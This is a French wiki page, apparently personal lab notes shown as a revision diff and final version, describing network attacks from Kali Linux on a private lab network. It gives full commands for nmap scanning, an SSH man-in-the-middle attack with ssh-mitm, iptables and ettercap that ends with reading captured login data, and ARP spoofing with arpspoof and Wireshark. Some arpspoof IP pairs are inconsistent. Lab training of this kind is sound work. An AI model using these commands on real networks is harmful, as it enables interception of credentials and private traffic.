« Utilisation de Utilisation de Kali » : différence entre les versions

De Travail-ivan
Aucun résumé des modifications
m Ivan a déplacé la page Utilisation de Kali vers Utilisation de Utilisation de Kali : Remplacement de texte : « Kali » par « Utilisation de Kali »
 
(7 versions intermédiaires par 2 utilisateurs non affichées)
Ligne 15 : Ligne 15 :
  sudo nmap -sV 192.168.56.10
  sudo nmap -sV 192.168.56.10


=== Attaque MITM d’un service SSH ===
=== Faire Attaque MITM d’un service SSH ===


Se déplacer dans le répertoire ssh-mitm
Se déplacer dans le répertoire ssh-mitm


  cd ssh-mitm
  cd ssh-mitm
 
lancer le service ssh-mitm
lancer le service ssh-mitm


Ligne 47 : Ligne 47 :
  sudo ./stop.sh
  sudo ./stop.sh


aller chercher les information de  connexion avec la commande suivante
Aller chercher les information de  connexion avec la commande suivante :


  sudo nano /home/ssh-mitm/shell_session_0.txt
  sudo nano /home/ssh-mitm/shell_session_0.txt
=== Faire une Attaque ARP spoofing ===
==== Mise en œuvre de l’attaque ====
Outils à utiliser sur le système attaquant ;
* Wireshark permettant d’analyser les trames transitant par le système attaquant.
* Outil arpspoof permettant d’usurper les communications de couches 2 et 3 (respectivement Ethernet et IPV4). L’installation se fait avec la commande.
Installer le paquet dsniff
sudo apt install dsniff
activer le routage
L’attaquant doit prendre le rôle d’un routeur et doit être paramétré en conséquence. On doit donc
positionner le paramètre d’environnement “forwarding” à la valeur “1” avec la commande :
sudo sysctl -w net.ipv4.conf.all.forwarding=1
Vérifier que le paramètre “forwarding” est bien positionné :
sudo sysctl net.ipv4.conf.all.forwarding
la commande doit retourner la valeur 1
==== Mener l’attaque d’ARP spoofing sur l’utilisateur et la gateway ====
Avant de lancer l’ARP Spoofing, nous allons vérifier le trafic transitant par l’attaquant en lançant l’analyseur de paquets WireShark :
Sur l’attaquant en mode graphique lancer wireshark en indiquant l’interface
d’écoute, dans l’exemple l’interface est « eth0 »:
sudo wireshark -ki eth0
Les commandes à renseigner sur l’attaquant pour l’arpspoofing sont les suivantes :
sudo arpspoof -t 192.168.56.10 192.168.10.254
sudo arpspoof -t 192.168.56.254 192.168.10.10
<big>△</big> Attention, chaque commande doit être lancée dans une session distincte de l’attaquant, car l’exécution d’un processus peut bloquer la saisie d’une autre commande au sein de la même session.
<big>'''Maintenant via  wiresharp vous voyer toutes les trames qui transites entre le routeur et l'utilisateur.'''</big>

Dernière version du 30 novembre 2023 à 20:58

Utilisation de Kali[modifier | modifier le wikicode]

Découverte des hôtes et services présents sur un réseau local[modifier | modifier le wikicode]

En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux :

Réaliser un scan du réseau[modifier | modifier le wikicode]

sudo nmap -sP 192.168.56.0/24

Scanner un hôtes[modifier | modifier le wikicode]

Afin de savoir quels ports sont ouverts sur ceux-ci et quels services sont proposés

sudo nmap -sV 192.168.56.10

Faire Attaque MITM d’un service SSH[modifier | modifier le wikicode]

Se déplacer dans le répertoire ssh-mitm

cd ssh-mitm

lancer le service ssh-mitm

sudo ./start.sh

activer le routage

sudo sysctl -w net.ipv4.ip_forward=1

Configurer redirection de ports afin de rediriger tous les flux à destination de la machine attaquante sur le port 22/TCP vers le port 2222 du système Kali Linux

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

Lancer attaque avec la commande ettercap

sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11//

• -T : lance ettercap en mode texte ; • -M : indique que l'on veut une attaque de type "Man in the middle" ; • 192.168.56.10 (serveur ssh) et 192.168.56.11 (client SSH) sont les adresses IP des victimes

Sur le poste de l’attaquant (Kali), il faut d’arrêter l’attaque ARP Spoofing, taper la touche Q pour arrêter.

arrêter le service ssh-mitm :

sudo ./stop.sh

Aller chercher les information de connexion avec la commande suivante :

sudo nano /home/ssh-mitm/shell_session_0.txt


Faire une Attaque ARP spoofing[modifier | modifier le wikicode]

Mise en œuvre de l’attaque[modifier | modifier le wikicode]

Outils à utiliser sur le système attaquant ;

  • Wireshark permettant d’analyser les trames transitant par le système attaquant.
  • Outil arpspoof permettant d’usurper les communications de couches 2 et 3 (respectivement Ethernet et IPV4). L’installation se fait avec la commande.

Installer le paquet dsniff

sudo apt install dsniff

activer le routage

L’attaquant doit prendre le rôle d’un routeur et doit être paramétré en conséquence. On doit donc positionner le paramètre d’environnement “forwarding” à la valeur “1” avec la commande :

sudo sysctl -w net.ipv4.conf.all.forwarding=1

Vérifier que le paramètre “forwarding” est bien positionné :

sudo sysctl net.ipv4.conf.all.forwarding

la commande doit retourner la valeur 1


Mener l’attaque d’ARP spoofing sur l’utilisateur et la gateway[modifier | modifier le wikicode]

Avant de lancer l’ARP Spoofing, nous allons vérifier le trafic transitant par l’attaquant en lançant l’analyseur de paquets WireShark :

Sur l’attaquant en mode graphique lancer wireshark en indiquant l’interface d’écoute, dans l’exemple l’interface est « eth0 »:

sudo wireshark -ki eth0

Les commandes à renseigner sur l’attaquant pour l’arpspoofing sont les suivantes :

sudo arpspoof -t 192.168.56.10 192.168.10.254
sudo arpspoof -t 192.168.56.254 192.168.10.10

Attention, chaque commande doit être lancée dans une session distincte de l’attaquant, car l’exécution d’un processus peut bloquer la saisie d’une autre commande au sein de la même session.


Maintenant via wiresharp vous voyer toutes les trames qui transites entre le routeur et l'utilisateur.